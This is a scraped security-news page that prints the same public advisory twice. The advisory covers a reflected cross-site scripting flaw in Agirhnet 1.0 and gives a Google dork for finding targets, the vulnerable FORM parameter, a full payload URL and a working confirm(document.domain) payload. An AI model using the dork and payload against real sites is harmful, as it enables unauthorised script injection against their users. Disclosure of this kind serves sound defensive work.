Exploit/Advisories no image

Published on February 22nd, 2022 📆 | 6404 Views ⚑

0

Agirhnet 1.0 Cross Site Scripting – Torchsec


iSpeech

# Exploit Title: [Agirhnet] - Reflected XSS via GET
# Google Dork: inurl:agirhnet
# Date: 2022-02-21
# Exploit Author: Daniel Martinez Adan (aDoN90)
# Vendor Homepage: https://agirh.net/
# Version: [app version] 1.0
# CVSS : 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

URL:
https://example.com/AgirhNet/LoadingProgress.aspx?FORM=/%22%0Aconfirm(document.domain)//

vulnerable Parameter : FORM

Payload: /%22%0Aconfirm(document.domain)//





it is compulsory to put the "/" at the beginning of the payload (it has to
recognize it as a URL)

Source link

Tagged with:

Exploit/Advisories no image

Published on February 22nd, 2022 📆 | 3515 Views ⚑

0

Agirhnet 1.0 Cross Site Scripting – Torchsec


iSpeech.org

# Exploit Title: [Agirhnet] - Reflected XSS via GET
# Google Dork: inurl:agirhnet
# Date: 2022-02-21
# Exploit Author: Daniel Martinez Adan (aDoN90)
# Vendor Homepage: https://agirh.net/
# Version: [app version] 1.0
# CVSS : 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

URL:
https://example.com/AgirhNet/LoadingProgress.aspx?FORM=/%22%0Aconfirm(document.domain)//

vulnerable Parameter : FORM





Payload: /%22%0Aconfirm(document.domain)//

it is compulsory to put the "/" at the beginning of the payload (it has to
recognize it as a URL)

Source link

Tagged with:



Comments are closed.